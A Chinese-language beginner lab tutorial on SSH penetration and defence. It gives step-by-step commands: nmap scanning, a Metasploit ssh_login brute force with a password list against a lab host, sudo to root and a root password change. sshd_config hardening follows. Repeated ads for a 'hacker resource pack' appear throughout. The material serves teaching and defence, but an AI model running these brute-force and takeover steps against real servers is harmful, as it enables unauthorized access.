网络安全零基础入门必看：Kali Linux如何进行SSH渗透与防御（非常详细）

一、实验

1.环境

（1）主机

表1 主机

系统	版本	IP	备注
Kali Linux	2022.4	192.168.204.154（动态）
Ubuntu	8.04	192.168.204.143	Kali(2022.4)的目标主机

（2）查看Kali Linux (2022.4)系统版本

cat /etc/os-release

（3） 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

2.nmap扫描目标主机

（1）扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

（2）扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

（1）进入MSF 控制台

msfconsole

(2) 搜索 ssh_login脚本

search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

 set rhosts 192.168.204.143

(4)查看选项

show options

（5）设置用户名与密码本

 set username msfadmin

set pass_file zidian.txt

(6)运⾏脚本

run 

（7）查看会话

sessions

（8）连接会话

sessions 1

查看用户身份

whoami

查看路径

pwd

提升权限

 sudo -i

再次查看用户身份

whoami

更改密码

password root

(9)MobaXterm远程连接

连接

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

3.Kali Linux 进行 SSH 防御

（1）SSH安全配置（端口）

vim /etc/ssh/sshd_config

修改端口

（2）重启

/etc/init.d/ssh  restart

（3）退出之前的MSF

（5）进入MSF 控制台

msfconsole

(6) 搜索 ssh_login脚本

search ssh_login

(6) 使⽤编号为 0 的脚本

use 0

(7) 设置⽬标主机

 set rhosts 192.168.204.143

（8）设置用户名与密码本

 set username msfadmin

set pass_file zidian.txt

(9)运⾏脚本

失败

run 

（10）nmap扫描端口

ssh端口为12345

nmap -sV 192.168.204.143

（11）查看选项

show options

(12) 设置目标端口

set rport 12345

(13)运⾏脚本

run 

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

（14）SSH安全配置（端口）

vim /etc/ssh/sshd_config

修改登录验证时间

（15）重启

/etc/init.d/ssh  restart

（16）验证（等待1分钟）

（17）SSH安全配置（容错次数）

vim /etc/ssh/sshd_config

修改容错次数

（18）重启

/etc/init.d/ssh  restart

（19）容错2次

二、问题

1.SSH有哪些安全配置

（1）配置

Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

（1）报错

[*] You have active sessions open, to exit anyway type "exit -y"

（2）原因分析

有session会话正在运行。

（3）解决方法

exit -y

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。（全套教程扫描领取哈）

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！ （全套教程扫描领取哈）

👉4.护网行动资料👈

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

👉5.黑客必读书单👈

👉6.网络安全岗面试题合集👈

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~